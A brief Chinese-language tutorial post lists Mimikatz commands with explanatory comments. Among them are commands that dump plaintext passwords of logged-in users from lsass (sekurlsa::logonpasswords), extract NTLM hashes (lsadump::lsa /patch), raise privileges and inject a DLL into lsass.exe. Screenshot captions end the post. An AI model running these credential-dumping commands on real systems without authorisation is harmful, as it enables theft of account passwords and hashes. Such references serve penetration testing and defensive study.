一、mimikatz很強大,他可以從lsass中獲取當前活躍賬戶的密碼,當然要是用它權限要求也較高。
二、mimikatz的命令
system::user //查看當前登錄的用戶
process::list //列出進程
process::stop processname //結束進程(有些進程結束不了,即使權限夠大)
process::suspend processname //暫停進程
process::modules //列出系統核心模塊和其所在的物理路徑
service::list //列出系統服務
service::stop(start) service_name //停止(開啓)服務
privilege::list //列出系統權限列表
privilege::debug /提升權限 (執行這條命令得有足夠的權限)
nogpo::cmd //打開cmd
nogpo::regedit //打開註冊表
ts::sessions //顯示當前回話
ts::processes //顯示當前進程及其PID
sekurlsa::logonpasswords //獲取當前在線用戶的明文密碼(需要高權限運行)
lsadump::lsa /patch //獲取當前此計算機存在過用戶的NTLMHASH
inject::process lsass.exe '路徑' sekurlsa.dll //進程注入(如果用1.0版本獲取hash的時候發現sekurlsa模塊存在,就可以用進程注入一個dll文件,然後在獲取hash)
三、部分命令截圖
1、sekurlsa::logonpasswords
2、lsadump::lsa /patch
(小弟只有這一個用戶。。)